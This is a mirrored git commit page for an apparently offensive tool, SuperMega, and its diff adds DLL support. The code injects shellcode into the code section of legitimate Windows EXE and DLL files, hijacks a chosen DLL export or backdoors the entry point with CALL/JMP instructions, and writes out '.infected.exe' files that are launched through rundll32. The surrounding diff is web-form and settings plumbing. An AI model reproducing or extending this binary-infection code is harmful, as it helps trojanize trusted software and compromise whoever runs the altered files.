admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: DLL support

Browse Source
This commit is contained in:
Dobin
2024-04-07 22:50:43 +01:00
parent a488cf1b17
commit c6a0cf14b0
8 changed files with 111 additions and 102 deletions
Download Patch File Download Diff File Expand all files Collapse all files
app/templates/project.html
+16 -4
View File
@@ -12,7 +12,7 @@
<div class="row">
<!-- Buttons -->
<!-- Row 1: Buttons -->
<div class="col-3">
<div class="row">
<div class="col-6">
@@ -46,7 +46,7 @@
{% endif %}
</div>
<!-- Input files -->
<!-- Row 2: Input files -->
<div class="col-3">
<!-- leave this here or it will fuck up layout -->
<form method="POST" enctype="multipart/form-data" action="/project_add">
@@ -74,14 +74,24 @@
>
{{exe}}</option>
{% endfor %}
</select>
{% if exports != None %}
<select class="form-select" name="dllfunc" aria-label="DLLFUNC" onchange="this.form.submit()">
{% for export in exports %}
<option value="{{export}}"
{% if export in project.settings.dllfunc %} selected {% endif %}
>
{{export}}</option>
{% endfor %}
</select>
{% endif %}
Is x64: {{ is_64}} <br>
Is Dotnet: {{ is_dotnet}}
</div>
<!-- row 3 -->
<!-- Row 3: settings -->
<div class="col-3">
<select class="form-select" name="source_style" aria-label="SOURCESTYLE" onchange="this.form.submit()">
{% for name, value in function_invoke_styles %}
@@ -100,6 +110,8 @@
</select>
</div>
<!-- Row 4: more settings -->
<div class="col-3">
<select class="form-select" name="decoder_style" aria-label="DECODERESTYLE" onchange="this.form.submit()">
{% for name, value in decoderstyles %}
app/templates/project_add_get.html
+2 -32
View File
@@ -19,38 +19,8 @@
<input type="text" name="project_name" class="form-control" placeholder="Projekt name" aria-label="PROJECTNAME" aria-describedby="basic-addon1">
<input type="text" name="comment" class="hidden form-control"
placeholder="Comment" value=""
aria-label="PROJECTNAME" aria-describedby="basic-addon1">
<select class="form-select" name="shellcode" aria-label="SHELLCODE">
{% for shellcode in shellcodes %}
<option value="{{shellcode}}">{{shellcode}}</option>
{% endfor %}
</select>
<select class="form-select" name="exe" aria-label="EXE">
{% for exe in exes %}
<option value="{{exe}}">{{exe}}</option>
{% endfor %}
</select>
<select class="form-select" name="source_style" aria-label="SOURCESTYLE">
{% for name, value in function_invoke_styles %}
<option value="{{name}}">{{value}}</option>
{% endfor %}
</select>
<select class="form-select" name="decoder_style" aria-label="DECODERESTYLE">
{% for name, value in decoderstyles %}
<option value="{{name}}">{{value}}</option>
{% endfor %}
</select>
<select class="form-select" name="carrier_invoke_style" aria-label="INJECTSTYLE">
{% for name, value in carrier_invoke_styles %}
<option value="{{name}}">{{value}}</option>
{% endfor %}
</select>
placeholder="Comment" value=""
aria-label="PROJECTNAME" aria-describedby="basic-addon1">
<button class="btn btn-primary" type="submit" value="save">Save</button>
app/views_project.py
+47 -47
View File
@@ -48,20 +48,28 @@ def project(name):
if os.path.exists(exe_path):
is_built = True
superpe = SuperPe(project.settings.inject_exe_in)
is_64 = superpe.is_64()
is_dotnet = superpe.is_dotnet()
exports = None
is_64 = False
is_dotnet = False
# Only when we selected an input file
if project.settings.inject_exe_in != "":
superpe = SuperPe(project.settings.inject_exe_in)
is_64 = superpe.is_64()
is_dotnet = superpe.is_dotnet()
if superpe.is_dll():
exports = [ "", "BZ2_blockSort" ]
project_dir = os.path.dirname(os.path.abspath(project.settings.inject_exe_out))
log_files = get_logfiles(project.settings.main_dir)
exes = []
exes = [ "" ]
for file in os.listdir(PATH_EXES):
exes.append(PATH_EXES + file)
for file in os.listdir(PATH_EXES_MORE):
exes.append(PATH_EXES_MORE + file)
shellcodes = []
shellcodes = [ "" ]
for file in os.listdir(PATH_SHELLCODES):
shellcodes.append(file)
@@ -80,6 +88,7 @@ def project(name):
function_invoke_styles=function_invoke_styles,
decoderstyles=decoderstyles,
carrier_invoke_styles=carrier_invoke_styles,
exports=exports,
log_files=log_files,
is_64=is_64,
@@ -95,62 +104,47 @@ def add_project():
project_name = request.form['project_name']
comment = request.form['comment']
settings.payload_path = PATH_SHELLCODES + request.form['shellcode']
if request.form['shellcode'] == "createfile.bin":
settings.verify = True
settings.try_start_final_infected_exe = False
# new project?
if storage.get_project(project_name) == None:
# add new project
project = WebProject(project_name, settings)
project.comment = comment
storage.add_project(project)
# update project
else:
settings.cleanup_files_on_exit = False
settings.payload_path = PATH_SHELLCODES + request.form['shellcode']
if request.form['shellcode'] == "createfile.bin":
settings.verify = True
settings.try_start_final_infected_exe = False
else:
settings.cleanup_files_on_exit = False
settings.inject_exe_in = request.form['exe']
settings.inject_exe_out = request.form['exe'].replace(".exe", ".infected.exe")
if 'dllfunc' in request.form:
settings.dllfunc = request.form['dllfunc']
source_style = request.form['source_style']
settings.source_style = FunctionInvokeStyle[source_style]
settings.inject_exe_in = request.form['exe']
settings.inject_exe_out = request.form['exe'].replace(".exe", ".infected.exe")
carrier_invoke_style = request.form['carrier_invoke_style']
settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
source_style = request.form['source_style']
settings.source_style = FunctionInvokeStyle[source_style]
decoder_style = request.form['decoder_style']
settings.decoder_style = DecoderStyle[decoder_style]
carrier_invoke_style = request.form['carrier_invoke_style']
settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
decoder_style = request.form['decoder_style']
settings.decoder_style = DecoderStyle[decoder_style]
if storage.get_project(project_name) != None:
# overwrite project
project = storage.get_project(project_name)
project.settings = settings
project.comment = comment
storage.save_project(project)
else:
# add new project
project = WebProject(project_name, settings)
project.comment = comment
storage.add_project(project)
return redirect("/project/{}".format(project_name), code=302)
else: # GET
exes = []
for file in os.listdir(PATH_EXES):
exes.append(PATH_EXES + file)
for file in os.listdir(PATH_EXES_MORE):
exes.append(PATH_EXES_MORE + file)
shellcodes = []
for file in os.listdir(PATH_SHELLCODES):
shellcodes.append(file)
function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
decoderstyles = [(color.name, color.value) for color in DecoderStyle]
carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
return render_template('project_add_get.html',
exes=exes,
shellcodes=shellcodes,
function_invoke_styles=function_invoke_styles,
decoderstyles=decoderstyles,
carrier_invoke_styles=carrier_invoke_styles,
)
return render_template('project_add_get.html')
def supermega_thread(settings: Settings):
@@ -164,6 +158,12 @@ def build_project(project_name):
global thread_running
project = storage.get_project(project_name)
if project.settings.inject_exe_in.endswith(".dll"):
if project.settings.dllfunc == "":
logger.error("DLL injection requires a DLL function name")
return redirect("/project/{}".format(project_name), code=302)
project.settings.try_start_final_infected_exe = False
prepare_project(project_name, project.settings)
thread = Thread(target=supermega_thread, args=(project.settings, ))
@@ -224,7 +224,7 @@ def start_project(project_name):
logger.info("--[ Verify infected exe")
exit_code = verify_injected_exe(project.settings.inject_exe_out)
elif no_exec == False:
run_exe(project.settings.inject_exe_out)
run_exe(project.settings.inject_exe_out, dllfunc=project.settings.dllfunc, check=False)
elif no_exec == True:
dirname = os.path.dirname(os.path.abspath(project.settings.inject_exe_out))
logger.info("--[ Open folder: {}".format(dirname))
helper.py
+4 -2
View File
@@ -49,11 +49,13 @@ def clean_files(settings):
pathlib.Path(file).unlink(missing_ok=True)
def run_exe(exefile, check=True):
def run_exe(exefile, dllfunc="", check=True):
logger.info("--[ Start infected file: {}".format(exefile))
if exefile.endswith(".dll"):
args = [ "rundll32.exe", "{},BZ2_blockSort".format(exefile) ]
if dllfunc == "":
raise Exception("---[ No DLL function specified")
args = [ "rundll32.exe", "{},{}".format(exefile, dllfunc) ]
elif exefile.endswith(".exe"):
args = [ exefile ]
else:
model/settings.py
+2
View File
@@ -14,6 +14,8 @@ class Settings():
self.dataref_style: DataRefStyle = DataRefStyle.APPEND
self.short_call_patching: bool = False
self.dllfunc: str = "" # For DLL injection
# Injectable
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = ""
pe/derbackdoorer.py
+29 -10
View File
@@ -30,7 +30,7 @@ class PeBackdoor:
self.backdoorOffsetRel: int = 0 # from start of the code section
def injectShellcode(self):
def injectShellcode(self, dllfunc=""):
sect = self.superpe.get_code_section()
if sect == None:
logger.error('Could not find code section in input PE file!')
@@ -46,14 +46,14 @@ Code section size : {sect_size}
''')
if self.superpe.is_dll():
offset = self.getExportEntryPoint("BZ2_blockSort")
logger.info("Inserting shellcode into DLL at 0x{:X} (sizes: sect {} shellcode {})".format(
offset, sect_size, len(self.shellcodeData)
offset = self.getExportEntryPoint(dllfunc)
logger.info("--[ Inserting shellcode into DLL at offset 0x{:X} (in {})".format(
offset, sect_name
))
else:
offset = int((sect_size - len(self.shellcodeData)) / 2)
logger.info("Inserting shellcode into EXE at 0x{:X} (sizes: sect {} shellcode {})".format(
offset, sect_size, len(self.shellcodeData)
logger.info("--[ Inserting shellcode into EXE at offset 0x{:X} (in {})".format(
offset, sect_name
))
self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData)
@@ -74,7 +74,7 @@ Trailing {sect_name} bytes:
{hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)}
''', '\t')
logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:X}')
logger.info(f'---[ Shellcode injected into existing code section at RVA 0x{rva:X}')
logger.debug(graph)
return True
@@ -104,13 +104,13 @@ Trailing {sect_name} bytes:
dec = lambda x: '???' if x is None else x.decode()
if len(exportName) == 0:
logger.critical('Export name not specified! Specify DLL Exported function name to hijack with -e/--export')
raise Exception('Export name not specified! Specify DLL Exported function name to hijack')
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.superpe.pe.parse_data_directories(directories=d)
if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
logger.error('No DLL exports found! Specify existing DLL Exported function with -e/--export!')
logger.error('No DLL exports found! Specify existing DLL Exported function')
return -1
exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols]
@@ -124,6 +124,25 @@ Trailing {sect_name} bytes:
return addr
return -1
def getRandomExport(self, choose_random=False):
dec = lambda x: '???' if x is None else x.decode()
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.superpe.pe.parse_data_directories(directories=d)
if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
raise Exception('No DLL exports found! Specify existing DLL Exported function')
exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols]
export = exports[0]
if choose_random:
export = exports[0]
name = export[1]
addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
logger.info(f'Using DLL Export "{name}" at RVA 0x{addr:X} . Attempting to hijack it...')
return name
def backdoorEntryPoint(self, addr = -1):
@@ -203,7 +222,7 @@ Trailing {sect_name} bytes:
found |= instr.mnemonic.lower() == 'call'
if found:
logger.info(f'Backdooring entry point {instr.mnemonic.upper()} instruction at 0x{instr.address:X} into:')
logger.info(f'--[ Backdooring entry point {instr.mnemonic.upper()} instruction at RVA 0x{instr.address:X} into:')
jump = random.choice([
f'CALL {reg}',
phases/injector.py
+10 -6
View File
@@ -44,13 +44,17 @@ def inject_exe(
superpe = SuperPe(exe_in)
pe_backdoorer = PeBackdoor(superpe, main_shc, carrier_invoke_style)
if not pe_backdoorer.injectShellcode():
if superpe.is_dll() and settings.dllfunc == "":
raise Exception("DLL injection requires a DLL function name")
if not pe_backdoorer.injectShellcode(dllfunc=settings.dllfunc):
logger.error('Could not inject shellcode into PE file!')
return False
if not pe_backdoorer.setupShellcodeEntryPoint():
logger.error('Could not setup shellcode launch within PE file!')
return False
if True: # not superpe.is_dll():
if not pe_backdoorer.setupShellcodeEntryPoint():
logger.error('Could not setup shellcode launch within PE file!')
return False
logger.info("--[ Rewrite placeholders with their data")
if source_style == FunctionInvokeStyle.iat_reuse:
@@ -161,12 +165,12 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
superpe.write_code_section_data(code)
def verify_injected_exe(exefile: FilePath) -> int:
def verify_injected_exe(exefile: FilePath, dllfunc="") -> int:
logger.info("---[ Verify infected exe: {} ".format(exefile))
# remove indicator file
pathlib.Path(VerifyFilename).unlink(missing_ok=True)
run_exe(exefile, check=False)
run_exe(exefile, dllfunc=dllfunc, check=False)
time.sleep(SHC_VERIFY_SLEEP)
if os.path.isfile(VerifyFilename):
logger.info("---> Verify OK. Infected exe works (file was created)")
supermega.py
+1 -1
View File
@@ -195,7 +195,7 @@ def start_real(settings: Settings):
if payload_exit_code != 0:
raise Exception("Payload exit code: {}".format(payload_exit_code))
elif settings.try_start_final_infected_exe:
run_exe(settings.inject_exe_out)
run_exe(settings.inject_exe_out, dllfunc=settings.dllfunc)
def obfuscate_shc_loader(file_shc_in, file_shc_out):